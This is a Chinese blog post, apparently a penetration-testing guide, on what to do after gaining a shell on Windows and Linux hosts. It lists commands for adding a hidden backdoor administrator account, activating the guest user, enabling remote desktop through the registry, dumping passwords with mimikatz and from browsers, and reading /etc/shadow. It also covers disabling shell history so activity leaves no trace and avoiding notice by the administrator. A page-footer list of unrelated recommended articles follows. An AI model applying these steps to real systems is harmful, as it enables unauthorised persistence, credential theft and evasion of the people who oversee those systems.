对于Windows系统主机和Linux系统主机,获取Shell后的操作都不同。

Windows

当我们通过对Web服务器进行渗透,拿到了该Web服务器的shell后,可以执行系统命令后,我们该如何操作呢?

第一步,先 whoami  查看用户身份,如果是系统用户那就再好不过了,如果是普通用户的话,就得想办法提权了。提权之后,利用mimikatz获取用户密码。如果是域环境的话,还可以获取登录过该主机的域用户密码。传送门——> 使用 mimikatz 破解windows登录密码

或者我们可以反弹一个MSF类型的shell到kali中,传送门——> 反弹MSF类型的Shell    ,  MSF之后渗透阶段

以下命令是在Windows主机渗透测试过程中可以用到的

#信息探测
ipconfig       #查看ip等信息
systeminfo     #查看系统信息
netstat -ano   #查看端口开放信息
tasklist /svc  #查看进程信息
net user       #查看主机用户
net localgroup #查看主机组
net share      #查看开放的共享
net view       #查看内网主机信息#添加用户后门
net user hack 123 /add                   #添加用户并设置密码
net localgroup administrators hack /add  #将用户加入管理组
net user guest /active:yes               #激活guest用户
net user guest mstlab                    #更改guest用户的密码

更多Windows CMD窗口的命令,传送门——> Windows常见的cmd命令

如果对方主机没开3389端口怎么办?以下命令可以开启远程桌面服务,前提是管理员权限。

1.通用开3389(优化后):wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 1
2.For Win2003:REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
3.For Win2008:REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
4.For Every:win08,三条命令即可,win2012通用;win7前两条即可。权限需要administrator。wmic /namespace:\root\cimv2 erminalservices path win32_terminalservicesetting where (__CLASS != "") call setallowtsconnections 1wmic /namespace:\root\cimv2  erminalservices path win32_tsgeneralsetting where (TerminalName ='RDP-Tcp') call setuserauthenticationrequired 1reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fSingleSessionPerUser /t REG_DWORD /d 0 /f

创建了后门用户,开启了远程桌面,我们就可以远程连接了。但是这里要注意,远程连接前判断该用户是否在线,万一对方管理员在线,你把人家给挤下去了,这样一下子就暴露了。开启远程桌面前慎重,慎重再慎重。

远程桌面登录后,我们查看桌面上有哪些软件,我们要找的目标有以下。

  • FTP相关的软件
  • 数据库相关的软件
  • 打开浏览器,查看历史记录,查看某些网站是否保存有用户密码。利用工具查看浏览器保存的密码

总结:获得了权限之后,尽一切可能搜集该主机的信息,该主机上各种服务的用户名和密码。为接下来的内网渗透弱口令爆破做准备。

Linux

在获得了Linux主机的权限后。第一步,我们要做的就是让我们接下来操作的所有命令不在主机上留下任何痕迹。我们可以执行下面的命令,这样我们接下来执行的所有命令都不会在 .bash_history中看到了。这条命令只对当前终端有效!

export HISTFILE=/dev/null export HISTSIZE=0

先查看当前用户身份,是否是root权限身份,如果不是的话,查看系统版本,是否可以利用已知漏洞提权的,比如 CVE-2016-5195 。 Linux下用SUID提权

然后要做的自然就是维持权限了,传送门——>  Linux获取权限

whoami       #查看当前用户身份
uname -a     #查看系统信息
history      #查看命令历史,有可能可以查看到管理员的一些重要命令,包括密码等
last         #查看登录历史
cat /etc/passwd  #查看用户
cat /etc/shadow  #查看密码

相关文章:Linux 主机超全渗透测试命令汇总

获取Shell(提权)后的操作(windows、Linux)相关推荐

  1. linux 目录提权,【安全科普】Linux提权——利用可执行文件SUID

    预估稿费:90RMB 投稿方式:发送邮件至linwei#360.cn,或登陆网页版在线投稿 SUID SUID(设置用户ID)是赋予文件的一种权限,它会出现在文件拥有者权限的执行位上,具有这种权限的文 ...

  2. linux80瑞口提权口今,史上最全Linux提权后获取敏感信息方法

    在本文开始之前,我想指出我不是专家.据我所知,在这个庞大的区域,没有一个"神奇"的答案.分享,共享(我的出发点).下面是一个混合的命令做同样的事情,在不同的地方,或只是一个不同的眼 ...

  3. 2008 r2 server 提权_某次Windows渗透提权过程

    0x01物色目标 大多数站点出于安全考虑,都会在robots.txt文件中屏蔽掉搜索引擎对敏感路径页面的爬取.robots文件里的敏感路径在针对一个目标渗透时可以帮助我们识别出重要页面,但它的存在不利 ...

  4. 脏牛Linux本地提权漏洞复现(CVE-2016-5195、Linux、Android、提权)

    漏洞范围: Linux kernel >= 2.6.22(2007年发行,到2016年10月18日才修复) 危害: 低权限用户利用该漏洞可以在众多Linux系统上实现本地提权 简要分析: 该漏洞 ...

  5. awk linux 获取端口号_Linux提权后获取敏感信息命令

    如果不能执行的可能是不同类型的linux. 系统版本? cat /etc/issue cat /etc/*-release cat /etc/lsb-release cat /etc/redhat-r ...

  6. linux我如何查看一个脚本的路径,linux获取shell脚本所在绝对路径操作介绍

    脚本名:a.sh 位置:/tmp/whuang/study/java 脚本内容: 复制代码 代码如下: #!/bin/sh this_dir=`pwd` dirname $0|grep "^ ...

  7. linux shell 脚本路径,linux获取shell脚本所在绝对路径操作介绍

    脚本名:a.sh 位置:/tmp/whuang/study/java 脚本内容: 复制代码 代码如下: #!/bin/sh this_dir=`pwd` dirname $0|grep "^ ...

  8. 使用MSF进行提权(windows提权、linux提权、wesng使用)

    文章目录 MSF Windows提权 反弹shell 提权 END推荐阅读 MSF Linux提权 反弹shell 补充wesng用法 Metasploit 是一个渗透框架,kali 内安装了,安装位 ...

  9. 【学习笔记】-提权篇(保姆级)

    系统层面提权:拿到webshell后通过对漏洞和工具的利用获取服务器权限或用户名及密码,开启远程连接. 网络层面提权:拿到webshell后无法绕过防火墙等来建立连接时可以通过反弹shell以及端口转 ...

  10. windows获取硬件设备的guid_Windows编程技术:提权技术(下)

    前面学了"令牌权限提升",今天来看下绕过UAC,这么多年都在讨论绕过UAC,确实也产生了许许多多的绕过方法,我们还是结合代码来看基本的方法.里面加入了一些COM接口的基本知识. U ...

最新文章

  1. SPCAMLEditor–灵活实用的CAML编辑工具(上)
  2. 【转】【UNITY3D 游戏开发之五】Google-protobuf与FlatBuffers数据的序列化和反序列化...
  3. python -- 进程
  4. 整理:深度学习 vs 机器学习 vs 模式识别
  5. 你需要的git命令大全来了
  6. 算法-排序-k排序(算法导论第三版第八章思考题8-5)
  7. Javascript 的模块化编程及加载模块【转载+整理】
  8. ORA-01438错误的解决方法
  9. Xamarin devexpress Grid
  10. 51单片机蜂鸣器播放音乐
  11. C#序列化枚举为字符串和自定义转换器
  12. 【路径规划】基于蚁群算法求解带举例约束的车辆路径问题(DVRP)matlab代码
  13. 市场研究中的数据分析知识整理 (四)-主成分分析和因子分析
  14. 塔防类游戏 ——简单的角色合并逻辑示例
  15. 【活动】为中秋献上祝福
  16. 新政举市暖冬再现? 业内乐观情绪高涨
  17. 高性能服务器设计[转自腾讯km,由qzhang同学翻译]
  18. 格里高利历java_java时间类简单总结
  19. qt 判断文件是否存在
  20. 如何从零开始训练BERT模型

热门文章

  1. 七龙珠 |召唤一份单细胞数据库汇总
  2. yanobox nodes 3 Mac新一代点线粒子特效运动图形插件
  3. 中国电子学会scratch等级考试四级
  4. P1420 最长连号(python3实现)
  5. 【php-laravel框架】第二节:laravel常用的扩展包汇总及安装教程
  6. 白鹭引擎定时器代码实例
  7. 操作系统课设之Windows 的互斥与同步
  8. 【ES11(2020)】可选链操作符和空值合并运算符
  9. linux中dpkg找不到命令_工作中常用的Linux命令介绍与实践
  10. PHP笔记-PHP中构造函数要注意的地方